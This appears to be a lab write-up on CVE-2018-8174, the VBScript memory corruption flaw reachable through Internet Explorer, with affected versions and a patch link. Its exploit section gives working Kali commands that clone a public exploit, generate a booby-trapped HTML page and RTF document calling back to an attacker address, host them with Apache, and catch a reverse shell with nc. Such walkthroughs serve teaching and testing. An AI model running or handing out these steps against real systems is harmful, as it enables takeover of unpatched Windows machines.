table of Contents
Vulnerability description
A remote code execution vulnerability exists in the way the VBScript engine handles objects in memory. The vulnerability may corrupt memory in a way that an attacker can execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user logs in with administrative user rights, an attacker who successfully exploited this vulnerability could take control of the affected system. Then, the attacker might install the program. View, change or delete data; or create a new account with full user rights.
In a web-based attack scenario, the attacker may have a specially crafted website designed to exploit this vulnerability through Internet Explorer, and then trick users into viewing the website. The attacker may also embed ActiveX controls marked as "initialization safe" in applications or Microsoft Office documents that host the IE rendering engine. The attacker may also use infected websites and websites that accept or host user-provided content or advertisements. These websites may contain specially crafted content that can exploit this vulnerability.
Impact version
- Windows 7
- Windows Server 2012 R2
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2012
- Windows 8.1
- Windows Server 2016
- Windows Server 2008 R2
- Windows 10
- Windows 10 server.
Vulnerability detection
https://github.com/clark515/CVE_PoC/
After downloading the file, copy the html file to our web server or the target machine.
When a system with a CVE-2018-8174 vulnerability uses IE to access the htm file, a calculator will pop up.
Exploit
Attack machine: kali
target machine: windows 7
Download the script to kali
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
Enter the file and generate just a script:
cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
- -u: URL address, malicious html file
- -o: Generate documentation
- -i: listening address
- -p: listening port
Copy the html file to the website directory
cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/
Open apache2 service
service apache2 start
Use nc for port monitoring
nc -lvvp 4444
When the target uses the ie browser to access the html file we constructed, it can obtain the shell permission
http://192.168.206.128/exploit.html
Attack machine nc monitoring online:
Bug fix
Patch address:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174
Select the corresponding system version, for example, I am a 32-bit windows 7 system
Run it directly after downloading
Reference address
https://www.freebuf.com/vuls/224379.html